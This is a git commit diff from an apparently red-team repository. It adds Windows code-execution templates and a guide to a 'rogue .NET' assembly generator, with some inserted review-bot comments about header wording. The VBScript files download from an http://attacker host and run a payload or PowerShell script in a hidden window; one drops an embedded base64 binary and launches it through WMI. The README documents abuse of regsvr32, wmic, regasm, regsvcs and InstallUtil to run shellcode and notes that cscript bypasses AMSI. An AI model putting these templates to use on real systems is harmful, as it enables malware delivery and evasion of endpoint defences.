Added code-exec-templates and some additions to rogue-dot-net
parent
b7c7da7b4e
commit
8b03b5ba40
@ -1,39 +1,39 @@
|
|||||||
#!/bin/bash
|
#!/bin/bash
|
||||||
|
|
||||||
modname=security2
|
modname=security2
|
||||||
friendlyname=WAF
|
friendlyname=WAF
|
||||||
|
|
||||||
if [ $# -ne 1 ]; then
|
if [ $# -ne 1 ]; then
|
||||||
echo "Usage: ./toggleWaf <on|off|status>"
|
echo "Usage: ./toggleWaf <on|off|status>"
|
||||||
exit 1
|
exit 1
|
||||||
fi
|
fi
|
||||||
|
|
||||||
case $1 in
|
case $1 in
|
||||||
"on")
|
"on")
|
||||||
if [ $EUID -ne 0 ]; then
|
if [ $EUID -ne 0 ]; then
|
||||||
echo "[!] This function must be run as root. Use sudo."
|
echo "[!] This function must be run as root. Use sudo."
|
||||||
exit 1
|
exit 1
|
||||||
fi
|
fi
|
||||||
a2enmod $modname > /dev/null
|
a2enmod $modname > /dev/null
|
||||||
systemctl reload apache2
|
systemctl reload apache2
|
||||||
echo "[+] $friendlyname enabled."
|
echo "[+] $friendlyname enabled."
|
||||||
;;
|
;;
|
||||||
|
|
||||||
"off")
|
"off")
|
||||||
if [ $EUID -ne 0 ]; then
|
if [ $EUID -ne 0 ]; then
|
||||||
echo "[!] This function must be run as root. Use sudo."
|
echo "[!] This function must be run as root. Use sudo."
|
||||||
exit 1
|
exit 1
|
||||||
fi
|
fi
|
||||||
a2dismod $modname > /dev/null
|
a2dismod $modname > /dev/null
|
||||||
systemctl reload apache2
|
systemctl reload apache2
|
||||||
echo "[-] $friendlyname disabled."
|
echo "[-] $friendlyname disabled."
|
||||||
;;
|
;;
|
||||||
|
|
||||||
"status")
|
"status")
|
||||||
if a2query -m $modname 2> /dev/null | grep -q 'enabled' ; then
|
if a2query -m $modname 2> /dev/null | grep -q 'enabled' ; then
|
||||||
echo "[+] $friendlyname is enabled."
|
echo "[+] $friendlyname is enabled."
|
||||||
else
|
else
|
||||||
echo "[-] $friendlyname is disabled."
|
echo "[-] $friendlyname is disabled."
|
||||||
fi
|
fi
|
||||||
;;
|
;;
|
||||||
esac
|
esac
|
||||||
|
@ -1,67 +1,71 @@
|
|||||||
### A small collection of unobfuscated code-execution primitives in different languages
|
### A small collection of unobfuscated code-execution primitives in different languages
|
||||||
|
|
||||||
A handy collection of small primitives/templates useulf for code-execution, downloading or otherwise offensive purposes. Whenever a quick sample of VBScript/JScript/C# code is needed - this directory should bring you one.
|
A handy collection of small primitives/templates useulf for code-execution, downloading or otherwise offensive purposes. Whenever a quick sample of VBScript/JScript/C# code is needed - this directory should bring you one.
|
||||||
|
|
||||||
Windows Script Host (WSH) subsystem can execute VBScript/JScript scritplets using two pre-installed interpreters:
|
Windows Script Host (WSH) subsystem can execute VBScript/JScript scritplets using two pre-installed interpreters:
|
||||||
|
|
||||||
- `cscript.exe` - to be used for command-line, dynamic script execution. **Doesn't load AMSI**
|
- `cscript.exe` - to be used for command-line, dynamic script execution. **Doesn't load AMSI**
|
||||||
|
|
||||||
- `wscript.exe` - For general scripts execution. **This one loads AMSI**
|
- `wscript.exe` - For general scripts execution. **This one loads AMSI**
|
||||||
|
|
||||||
|
|
||||||
---
|
---
|
||||||
|
|
||||||
#### VBScript
|
#### VBScript
|
||||||
|
|
||||||
- **`download-file-and-exec.vbs`** - Downloads a binary file using `Msxml2.ServerXMLHTTP`, stores it to the disk `Adodb.Stream` and then launches it via `Wscript.Shell Run`
|
- **`download-file-and-exec.vbs`** - Downloads a binary file using `Msxml2.ServerXMLHTTP`, stores it to the disk `Adodb.Stream` and then launches it via `Wscript.Shell Run`
|
||||||
|
|
||||||
- **`wmi-exec-command.vbs`** - Example of VBScript code execution via WMI class' `Win32_Process` static method `Create`
|
- **`download-powershell-and-exec-via-stdin`** - Downloads a Powershell script/commands from a given URL and passes them to _Powershell_'s `StdIn`
|
||||||
|
|
||||||
- **`wscript-shell-code-exec.vbs`** - Code execution via `WScript.Shell` in a hidden window.
|
- **`drop-binary-file-and-launch.vbs`** - Drops embedded base64 encoded binary file to disk and then launches it.
|
||||||
|
|
||||||
- **`wscript-shell-stdin-code-exec.vbs`** - Code execution via `WScript.Shell` in a hidden window through a command passed from StdIn to `powershell`
|
- **`wmi-exec-command.vbs`** - Example of VBScript code execution via WMI class' `Win32_Process` static method `Create`
|
||||||
|
|
||||||
|
- **`wscript-shell-code-exec.vbs`** - Code execution via `WScript.Shell` in a hidden window.
|
||||||
---
|
|
||||||
|
- **`wscript-shell-stdin-code-exec.vbs`** - Code execution via `WScript.Shell` in a hidden window through a command passed from StdIn to `powershell`
|
||||||
#### JScript
|
|
||||||
|
|
||||||
|
---
|
||||||
---
|
|
||||||
|
#### JScript
|
||||||
#### XSL
|
|
||||||
|
|
||||||
XSL files can be executed in the following ways:
|
---
|
||||||
|
|
||||||
- Using `wmic.exe`:
|
#### XSL
|
||||||
```
|
|
||||||
wmic os get /format:"jscript-xslt-template.xsl"
|
XSL files can be executed in the following ways:
|
||||||
```
|
|
||||||
|
- Using `wmic.exe`:
|
||||||
Templates:
|
```
|
||||||
|
wmic os get /format:"jscript-xslt-template.xsl"
|
||||||
- **`hello-world-jscript-xslt.xsl`** - A sample backbone for XSLT file with JScript code showing a simple message box.
|
```
|
||||||
|
|
||||||
- **`wscript-shell-run-jscript-xslt.xsl`** - JScript XSLT with `WScript.Shell.Run` method
|
Templates:
|
||||||
|
|
||||||
|
- **`hello-world-jscript-xslt.xsl`** - A sample backbone for XSLT file with JScript code showing a simple message box.
|
||||||
|
|
||||||
---
|
- **`wscript-shell-run-jscript-xslt.xsl`** - JScript XSLT with `WScript.Shell.Run` method
|
||||||
|
|
||||||
#### COM Scriptlets
|
|
||||||
|
|
||||||
Sample code execution with `regsvr32` can be following:
|
---
|
||||||
```
|
|
||||||
regsvr32 /u /n /s /i:wscript-shell-run-jscript-scriptlet.sct scrobj.dll
|
#### COM Scriptlets
|
||||||
```
|
|
||||||
|
Sample code execution with `regsvr32` can be following:
|
||||||
- **`wscript-shell-run-jscript-scriptlet.sct`** - SCT file with JSCript code execution via `WScript.Shell.Run`
|
```
|
||||||
|
regsvr32 /u /n /s /i:wscript-shell-run-jscript-scriptlet.sct scrobj.dll
|
||||||
|
```
|
||||||
---
|
|
||||||
|
- **`wscript-shell-run-jscript-scriptlet.sct`** - SCT file with JSCript code execution via `WScript.Shell.Run`
|
||||||
#### HTA
|
|
||||||
|
|
||||||
HTA files are HTML Applications
|
---
|
||||||
|
|
||||||
|
#### HTA
|
||||||
|
|
||||||
|
HTA files are HTML Applications
|
||||||
|
|
||||||
- **`wscript-shell-run-vbscript.hta`** - A backbone for `WScript.Shell.Run` via _VBScript_
|
- **`wscript-shell-run-vbscript.hta`** - A backbone for `WScript.Shell.Run` via _VBScript_
|
@ -1,38 +1,36 @@
|
|||||||
'
|
'
|
||||||
' Example of downloading a binary file from the URL, saving it to the
|
' Example of downloading a binary file from the URL, saving it to the
|
||||||
' local filesystem and then launching.
|
' local filesystem and then launching.
|
||||||
'
|
'
|
||||||
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
||||||
' (https://github.com/mgeeky)
|
' (https://github.com/mgeeky)
|
||||||
'
|
'
|
||||||
|
|
||||||
downloadURL = "http://attacker/payload.exe"
|
downloadURL = "http://attacker/payload.exe"
|
||||||
saveAs = "%TEMP%\foo.exe"
|
saveAs = "%TEMP%\foo.exe"
|
||||||
parameters = ""
|
parameters = ""
|
||||||
|
|
||||||
Dim sh: Set sh = CreateObject("WScript.Shell")
|
Dim sh: Set sh = CreateObject("WScript.Shell")
|
||||||
out = sh.ExpandEnvironmentStrings(saveAs)
|
out = sh.ExpandEnvironmentStrings(saveAs)
|
||||||
|
|
||||||
' STEP 1: Download File
|
' STEP 1: Download File
|
||||||
Dim xhr: Set xhr = CreateObject("Msxml2.ServerXMLHTTP")
|
Dim xhr: Set xhr = CreateObject("Msxml2.ServerXMLHTTP")
|
||||||
xhr.Open "GET", downloadURL, False
|
xhr.Open "GET", downloadURL, False
|
||||||
xhr.Send
|
xhr.Send
|
||||||
|
|
||||||
' STEP 2: Save binary file
|
' STEP 2: Save binary file
|
||||||
If xhr.Status = 200 Then
|
If xhr.Status = 200 Then
|
||||||
With CreateObject("Adodb.Stream")
|
With CreateObject("Adodb.Stream")
|
||||||
.Open
|
.Open
|
||||||
.Type = 1
|
.Type = 1
|
||||||
.write xhr.responseBody
|
.write xhr.responseBody
|
||||||
.savetofile out, 2
|
.savetofile out, 2
|
||||||
End With
|
End With
|
||||||
|
|
||||||
' STEP 3: Execute file
|
' STEP 3: Execute file
|
||||||
cmd = out & " " & parameters
|
cmd = out & " " & parameters
|
||||||
MsgBox cmd
|
sh.Run cmd, 0, False
|
||||||
sh.Run cmd, 0, False
|
End If
|
||||||
|
|
||||||
End If
|
Set sh = Nothing
|
||||||
|
|
||||||
Set sh = Nothing
|
|
||||||
Set xhr = Nothing
|
Set xhr = Nothing
|
@ -0,0 +1,34 @@
|
|||||||
|
'
|
||||||
|
' Example of downloading a binary file from the URL, saving it to the
|
||||||
|
' local filesystem and then launching.
|
||||||
|
'
|
||||||
|
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
||||||
|
' (https://github.com/mgeeky)
|
||||||
|
'
|
||||||
|
|
||||||
|
scriptURL = "http://attacker/script.ps1"
|
||||||
|
launcher = "powershell -nop -w hid -Command -"
|
||||||
|
|
||||||
|
Dim xhr: Set xhr = CreateObject("MSXML2.XMLHTTP")
|
||||||
|
xhr.Open "GET", scriptURL, False
|
||||||
|
xhr.Send
|
||||||
|
|
||||||
|
Function bin2a(Binary)
|
||||||
|
Dim I,S
|
||||||
|
For I = 1 to LenB(Binary)
|
||||||
|
S = S & Chr(AscB(MidB(Binary,I,1)))
|
||||||
|
Next
|
||||||
|
bin2a = S
|
||||||
|
End Function
|
||||||
|
|
||||||
|
If xhr.Status = 200 Then
|
||||||
|
With CreateObject("WScript.Shell")
|
||||||
|
With .Exec(launcher)
|
||||||
|
.StdIn.WriteLine bin2a(xhr.responseBody)
|
||||||
|
.StdIn.WriteBlankLines 1
|
||||||
|
.Terminate
|
||||||
|
End With
|
||||||
|
End With
|
||||||
|
End If
|
||||||
|
|
||||||
|
Set xhr = Nothing
|
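Review bot: The header comment at the top of this new file is copied from download-file-and-exec.vbs and does not match the code: nothing is saved to the local filesystem here, the response body is converted by `bin2a` and written to the StdIn of the `launcher` process. I would replace the two description lines with `' Example of downloading a PowerShell script from the URL and passing it` / `' to the launcher (powershell) over StdIn, without saving it to disk.` Accurate wording matters to anyone triaging this sample, because the observable behaviour is a script host spawning `powershell ... -Command -` rather than a dropped executable. The file name is not shown in this section; the README hunk suggests it is `download-powershell-and-exec-via-stdin`.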
@ -0,0 +1,47 @@
|
|||||||
|
'
|
||||||
|
' Example of dropping an embedded, base64 encoded binary file to the disk,
|
||||||
|
' decoding it and then launching.
|
||||||
|
'
|
||||||
|
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
||||||
|
' (https://github.com/mgeeky)
|
||||||
|
'
|
||||||
|
|
||||||
|
saveFileAs = "%TEMP%\foo.exe"
|
||||||
|
launchParameters = ""
|
||||||
|
|
||||||
|
' =============================================================
|
||||||
|
|
||||||
|
fileBuffer = "<PASTE-HERE-YOUR-BASE64-ENCODED-BLOB>"
|
||||||
|
|
||||||
|
' =============================================================
|
||||||
|
|
||||||
|
Function Base64Decode(ByVal vCode)
|
||||||
|
Set oNode = CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64")
|
||||||
|
oNode.dataType = "bin.base64"
|
||||||
|
oNode.text = vCode
|
||||||
|
Base64Decode = oNode.nodeTypedValue
|
||||||
|
Set oNode = Nothing
|
||||||
|
End Function
|
||||||
|
|
||||||
|
Dim sh: Set sh = CreateObject("WScript.Shell")
|
||||||
|
out = sh.ExpandEnvironmentStrings(saveFileAs)
|
||||||
|
|
||||||
|
With CreateObject("Adodb.Stream")
|
||||||
|
.Open
|
||||||
|
.Type = 1
|
||||||
|
.write Base64Decode(fileBuffer)
|
||||||
|
.savetofile out, 2
|
||||||
|
End With
|
||||||
|
|
||||||
|
computer = "."
|
||||||
|
Set wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" _
|
||||||
|
& computer & "\root\cimv2")
|
||||||
|
|
||||||
|
Set startup = wmi.Get("Win32_ProcessStartup")
|
||||||
|
Set conf = startup.SpawnInstance_
|
||||||
|
conf.ShowWindow = 12
|
||||||
|
|
||||||
|
Set proc = GetObject("winmgmts:root\cimv2:Win32_Process")
|
||||||
|
|
||||||
|
command = out & " " & launchParameters
|
||||||
|
proc.Create command, Null, conf, intProcessID
|
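Review bot: The header comment only says the file is dropped and "then launching", but the launch at the end of the file goes through WMI (`Win32_Process` `Create` with `conf.ShowWindow = 12`), not through the `WScript.Shell` object created earlier, and the comment should say so. I would add `' The dropped file is started via WMI Win32_Process.Create in a hidden window (ShowWindow = 12),` / `' so the new process is presumably parented by the WMI provider host, not by the script host.` The comment also lists the steps in a different order than the code, which decodes `fileBuffer` first and only then writes it with `.savetofile`. Unlike download-file-and-exec.vbs, this file never sets `sh`, `wmi`, `startup` or `proc` to `Nothing`; a matching cleanup block at the end would keep the templates consistent.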
@ -1,15 +1,15 @@
|
|||||||
<?xml version='1.0'?>
|
<?xml version='1.0'?>
|
||||||
<stylesheet
|
<stylesheet
|
||||||
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
|
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
|
||||||
xmlns:user="placeholder"
|
xmlns:user="placeholder"
|
||||||
version="1.0">
|
version="1.0">
|
||||||
<output method="text"/>
|
<output method="text"/>
|
||||||
<ms:script implements-prefix="user" language="JScript">
|
<ms:script implements-prefix="user" language="JScript">
|
||||||
<![CDATA[
|
<![CDATA[
|
||||||
|
|
||||||
// Hello world
|
// Hello world
|
||||||
var shell = new ActiveXObject("WScript.Shell");
|
var shell = new ActiveXObject("WScript.Shell");
|
||||||
shell.Popup("Hello world from JScript XSL!");
|
shell.Popup("Hello world from JScript XSL!");
|
||||||
|
|
||||||
]]> </ms:script>
|
]]> </ms:script>
|
||||||
</stylesheet>
|
</stylesheet>
|
@ -1,20 +1,20 @@
|
|||||||
'
|
'
|
||||||
' This script uses WMI class' Win32_Process static method Create to
|
' This script uses WMI class' Win32_Process static method Create to
|
||||||
' execute given command in a hidden window (ShowWindow = 12).
|
' execute given command in a hidden window (ShowWindow = 12).
|
||||||
'
|
'
|
||||||
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
||||||
' (https://github.com/mgeeky)
|
' (https://github.com/mgeeky)
|
||||||
'
|
'
|
||||||
|
|
||||||
command = "notepad.exe"
|
command = "notepad.exe"
|
||||||
computer = "."
|
computer = "."
|
||||||
|
|
||||||
Set wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" _
|
Set wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" _
|
||||||
& computer & "\root\cimv2")
|
& computer & "\root\cimv2")
|
||||||
|
|
||||||
Set startup = wmi.Get("Win32_ProcessStartup")
|
Set startup = wmi.Get("Win32_ProcessStartup")
|
||||||
Set conf = startup.SpawnInstance_
|
Set conf = startup.SpawnInstance_
|
||||||
conf.ShowWindow = 12
|
conf.ShowWindow = 12
|
||||||
|
|
||||||
Set proc = GetObject("winmgmts:root\cimv2:Win32_Process")
|
Set proc = GetObject("winmgmts:root\cimv2:Win32_Process")
|
||||||
proc.Create command, Null, conf, intProcessID
|
proc.Create command, Null, conf, intProcessID
|
@ -1,13 +1,13 @@
|
|||||||
'
|
'
|
||||||
' This script uses classic WScript.Shell Run method to
|
' This script uses classic WScript.Shell Run method to
|
||||||
' execute given command in a hidden window (second param = 0)
|
' execute given command in a hidden window (second param = 0)
|
||||||
'
|
'
|
||||||
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
||||||
' (https://github.com/mgeeky)
|
' (https://github.com/mgeeky)
|
||||||
'
|
'
|
||||||
|
|
||||||
command = "notepad.exe"
|
command = "notepad.exe"
|
||||||
|
|
||||||
With CreateObject("WScript.Shell")
|
With CreateObject("WScript.Shell")
|
||||||
.Run command, 0, False
|
.Run command, 0, False
|
||||||
End With
|
End With
|
||||||
|
@ -1,15 +1,15 @@
|
|||||||
<?XML version="1.0"?>
|
<?XML version="1.0"?>
|
||||||
<scriptlet>
|
<scriptlet>
|
||||||
<registration
|
<registration
|
||||||
progid="Foo"
|
progid="Foo"
|
||||||
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
|
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
|
||||||
<script language="JScript">
|
<script language="JScript">
|
||||||
<![CDATA[
|
<![CDATA[
|
||||||
|
|
||||||
var command = "notepad.exe";
|
var command = "notepad.exe";
|
||||||
var r = new ActiveXObject("WScript.Shell").Run(command);
|
var r = new ActiveXObject("WScript.Shell").Run(command);
|
||||||
|
|
||||||
]]>
|
]]>
|
||||||
</script>
|
</script>
|
||||||
</registration>
|
</registration>
|
||||||
</scriptlet>
|
</scriptlet>
|
@ -1,14 +1,14 @@
|
|||||||
<?xml version='1.0'?>
|
<?xml version='1.0'?>
|
||||||
<stylesheet
|
<stylesheet
|
||||||
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
|
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
|
||||||
xmlns:user="placeholder"
|
xmlns:user="placeholder"
|
||||||
version="1.0">
|
version="1.0">
|
||||||
<output method="text"/>
|
<output method="text"/>
|
||||||
<ms:script implements-prefix="user" language="JScript">
|
<ms:script implements-prefix="user" language="JScript">
|
||||||
<![CDATA[
|
<![CDATA[
|
||||||
|
|
||||||
var command = "notepad";
|
var command = "notepad";
|
||||||
var r = new ActiveXObject("WScript.Shell").Run(command);
|
var r = new ActiveXObject("WScript.Shell").Run(command);
|
||||||
|
|
||||||
]]> </ms:script>
|
]]> </ms:script>
|
||||||
</stylesheet>
|
</stylesheet>
|
@ -1,14 +1,14 @@
|
|||||||
<html>
|
<html>
|
||||||
<head>
|
<head>
|
||||||
<script language="VBScript">
|
<script language="VBScript">
|
||||||
Sub foo
|
Sub foo
|
||||||
command = "notepad.exe"
|
command = "notepad.exe"
|
||||||
Set objShell = CreateObject("Wscript.Shell")
|
Set objShell = CreateObject("Wscript.Shell")
|
||||||
objShell.Run command
|
objShell.Run command
|
||||||
End Sub
|
End Sub
|
||||||
foo()
|
foo()
|
||||||
</script>
|
</script>
|
||||||
</head>
|
</head>
|
||||||
<body>
|
<body>
|
||||||
</body>
|
</body>
|
||||||
</html>
|
</html>
|
@ -1,19 +1,19 @@
|
|||||||
'
|
'
|
||||||
' This script uses classic WScript.Shell Exec method to
|
' This script uses classic WScript.Shell Exec method to
|
||||||
' execute given command in a hidden window via StdIn passed to a dedicated
|
' execute given command in a hidden window via StdIn passed to a dedicated
|
||||||
' launcher command (powershell.exe in this example).
|
' launcher command (powershell.exe in this example).
|
||||||
'
|
'
|
||||||
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
||||||
' (https://github.com/mgeeky)
|
' (https://github.com/mgeeky)
|
||||||
'
|
'
|
||||||
|
|
||||||
command = "notepad.exe"
|
command = "notepad.exe"
|
||||||
launcher = "powershell -nop -w hid -Command -"
|
launcher = "powershell -nop -w hid -Command -"
|
||||||
|
|
||||||
With CreateObject("WScript.Shell")
|
With CreateObject("WScript.Shell")
|
||||||
With .Exec(launcher)
|
With .Exec(launcher)
|
||||||
.StdIn.WriteLine command
|
.StdIn.WriteLine command
|
||||||
.StdIn.WriteBlankLines 1
|
.StdIn.WriteBlankLines 1
|
||||||
.Terminate
|
.Terminate
|
||||||
End With
|
End With
|
||||||
End With
|
End With
|
||||||
|
@ -1,90 +1,90 @@
|
|||||||
## Rogue .NET Assembly for Regsvcs/Regasm/InstallUtil Code Execution
|
## Rogue .NET Assembly for Regsvcs/Regasm/InstallUtil Code Execution
|
||||||
|
|
||||||
Follow below described steps to properly generate your source code and then compile it into a nice rogue .NET Assembly ready to be executed by:
|
Follow below described steps to properly generate your source code and then compile it into a nice rogue .NET Assembly ready to be executed by:
|
||||||
|
|
||||||
- [Regasm](https://lolbas-project.github.io/lolbas/Binaries/Regasm/)
|
- [Regasm](https://lolbas-project.github.io/lolbas/Binaries/Regasm/)
|
||||||
- [Regsvcs](https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/)
|
- [Regsvcs](https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/)
|
||||||
- [InstallUtil](https://lolbas-project.github.io/lolbas/Binaries/Installutil/)
|
- [InstallUtil](https://lolbas-project.github.io/lolbas/Binaries/Installutil/)
|
||||||
|
|
||||||
### Step 1: Generate key.snk file
|
### Step 1: Generate key.snk file
|
||||||
|
|
||||||
```
|
```
|
||||||
powershell -file build.ps1
|
powershell -file build.ps1
|
||||||
```
|
```
|
||||||
|
|
||||||
### Step 2: Generate source code file
|
### Step 2: Generate source code file
|
||||||
|
|
||||||
Included in this directory script is a helper utility allowing one to quickly generate desired csharp source code file to be used for further `csc` compilation.
|
Included in this directory script is a helper utility allowing one to quickly generate desired csharp source code file to be used for further `csc` compilation.
|
||||||
|
|
||||||
Usage:
|
Usage:
|
||||||
|
|
||||||
```
|
```
|
||||||
python3 generateRogueDotNet.py --help
|
python3 generateRogueDotNet.py --help
|
||||||
|
|
||||||
:: Rogue .NET Source Code Generation Utility
|
:: Rogue .NET Source Code Generation Utility
|
||||||
To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil.
|
To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil.
|
||||||
Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
||||||
|
|
||||||
usage: .\generateRogueDotNet.py [options] <inputFile>
|
usage: .\generateRogueDotNet.py [options] <inputFile>
|
||||||
|
|
||||||
positional arguments:
|
positional arguments:
|
||||||
inputFile Input file to be embeded within C# code. May be either Powershell script, raw binary Shellcode or .NET Assembly (PE/EXE) file.
|
inputFile Input file to be embeded within C# code. May be either Powershell script, raw binary Shellcode or .NET Assembly (PE/EXE) file.
|
||||||
|
|
||||||
optional arguments:
|
optional arguments:
|
||||||
-h, --help show this help message and exit
|
-h, --help show this help message and exit
|
||||||
-e, --exe Specified input file is an Mono/.Net assembly PE/EXE. WARNING: Launching EXE is currently possible ONLY WITH MONO/.NET assembly EXE/DLL files, not an ordinary native PE/EXE!
|
-e, --exe Specified input file is an Mono/.Net assembly PE/EXE. WARNING: Launching EXE is currently possible ONLY WITH MONO/.NET assembly EXE/DLL files, not an ordinary native PE/EXE!
|
||||||
-r, --raw Specified input file is a raw Shellcode to be injected in self process in a separate Thread.
|
-r, --raw Specified input file is a raw Shellcode to be injected in self process in a separate Thread.
|
||||||
```
|
```
|
||||||
|
|
||||||
Sample use case:
|
Sample use case:
|
||||||
|
|
||||||
```
|
```
|
||||||
python3 generateRogueDotNet.py -r notepad64.bin > program.cs
|
python3 generateRogueDotNet.py -r notepad64.bin > program.cs
|
||||||
|
|
||||||
:: Rogue .NET Source Code Generation Utility
|
:: Rogue .NET Source Code Generation Utility
|
||||||
To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil.
|
To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil.
|
||||||
Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
||||||
|
|
||||||
[?] File specified as raw Shellcode.
|
[?] File specified as raw Shellcode.
|
||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
### Step 3: Compilate library .NET Assembly
|
### Step 3: Compilate library .NET Assembly
|
||||||
|
|
||||||
```
|
```
|
||||||
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs
|
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs
|
||||||
```
|
```
|
||||||
|
|
||||||
If you passed Powershell code to be launched in a .NET Runspace, then an additional assembly will have to be used to compile resulting source code properly - meaning System.Management.Automation.dll (provided with this script). Then proper compilation command will be:
|
If you passed Powershell code to be launched in a .NET Runspace, then an additional assembly will have to be used to compile resulting source code properly - meaning System.Management.Automation.dll (provided with this script). Then proper compilation command will be:
|
||||||
|
|
||||||
```
|
```
|
||||||
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.Management.Automation.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs
|
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.Management.Automation.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
### Step 4: Code execution via Regsvcs, Regasm or InstallUtil:
|
### Step 4: Code execution via Regsvcs, Regasm or InstallUtil:
|
||||||
|
|
||||||
- x86:
|
- x86:
|
||||||
```
|
```
|
||||||
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe rogue.dll
|
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe rogue.dll
|
||||||
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U rogue.dll
|
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U rogue.dll
|
||||||
|
|
||||||
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe rogue.dll
|
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe rogue.dll
|
||||||
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U rogue.dll
|
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U rogue.dll
|
||||||
|
|
||||||
%WINDIR%\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
%WINDIR%\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
||||||
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
||||||
```
|
```
|
||||||
|
|
||||||
- x64:
|
- x64:
|
||||||
```
|
```
|
||||||
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe rogue.dll
|
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe rogue.dll
|
||||||
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U rogue.dll
|
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U rogue.dll
|
||||||
|
|
||||||
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe rogue.dll
|
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe rogue.dll
|
||||||
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe /U rogue.dll
|
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe /U rogue.dll
|
||||||
|
|
||||||
%WINDIR%\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
%WINDIR%\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
||||||
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
||||||
```
|
```
|
@ -1,387 +1,387 @@
|
|||||||
#!/usr/bin/python3
|
#!/usr/bin/python3
|
||||||
#
|
#
|
||||||
# Red-Teaming script that constructs C# code for Regsvcs/Regasm/InstallUtil code execution technique.
|
# Red-Teaming script that constructs C# code for Regsvcs/Regasm/InstallUtil code execution technique.
|
||||||
#
|
#
|
||||||
# Step 1: Generate source code file
|
# Step 1: Generate source code file
|
||||||
# cmd> python3 generateRogueDotNet.py -r payload.bin > program.cs
|
# cmd> python3 generateRogueDotNet.py -r payload.bin > program.cs
|
||||||
#
|
#
|
||||||
# Step 2: Compilate library .NET Assembly
|
# Step 2: Compilate library .NET Assembly
|
||||||
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs
|
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs
|
||||||
#
|
#
|
||||||
# if you passed Powershell code to be launched in a .NET Runspace, then an additional assembly will have to be used
|
# if you passed Powershell code to be launched in a .NET Runspace, then an additional assembly will have to be used
|
||||||
# to compile resulting source code properly - meaning System.Management.Automation.dll (provided with this script).
|
